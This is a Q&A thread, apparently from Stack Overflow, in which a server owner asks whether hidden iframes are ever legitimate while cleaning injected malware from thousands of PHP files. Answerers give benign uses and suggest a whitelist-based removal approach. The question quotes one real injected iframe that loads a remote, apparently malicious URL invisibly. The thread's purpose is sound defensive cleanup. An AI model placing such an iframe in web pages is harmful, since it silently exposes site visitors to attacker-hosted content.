0

Is there any legit use for hidden iframe? I've got viruses as per Can a file be read and written right back with small changes without knowing its encoding in C#? which are all over the php files (it seems one entry per file but can't be sure with 5000 files).

The ones I found have this but I can't be sure there are others with something a bit different inside. Could I assume all iframe where visibility is hidden are malicious?

<iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe>

Or maybe there's other way I could tell my c# code to look at it? I don't want to break the files and websites but I can't just look for exact value as I may miss something.

Community
  • 1
  • 1
MadBoy
  • 10,824
  • 24
  • 95
  • 156
  • Interesting thing happens if I edit the post and won't use ` the iframe code won't be displayed.. – MadBoy Feb 10 '12 at 00:15

2 Answers2

2

A hidden IFRAME can certainly be useful for malicious purposes, but it can be used legitimately. For example, you could use a hidden IFRAME to emulate asynchronous calls to the server (ASP.Net did this at one point, if I recall).

I have also used IFRAMEs to get around file upload control limitations (both hidden and visible IFRAMEs can be useful for this).

Suspicious, but not malicious by default.

Tim M.
  • 53,671
  • 14
  • 120
  • 163
1

Some old traffic counters I've seen use hidden iFrames to count traffic, but that's about the only legitimate usage of a hidden iFrame; I certainly don't like it and if it were me, I would remove those as well.

Another thing you could check for is if the iFrame was hidden and the source is not from your domain.

Francis Lewis
  • 8,872
  • 9
  • 55
  • 65
  • There will be multiple sites/domains in the file search. I will be going thru whole server so hard to say if it's my domain or not. – MadBoy Feb 10 '12 at 00:22
  • You could create the script to log results that way you could look through each one to see if it's legit, then if any are legit, create a domain whitelist, then have the script remove any hidden iframes that aren't in the whitelist. – Francis Lewis Feb 10 '12 at 00:25
  • I guess I could do this :-) Nice suggestion – MadBoy Feb 10 '12 at 00:26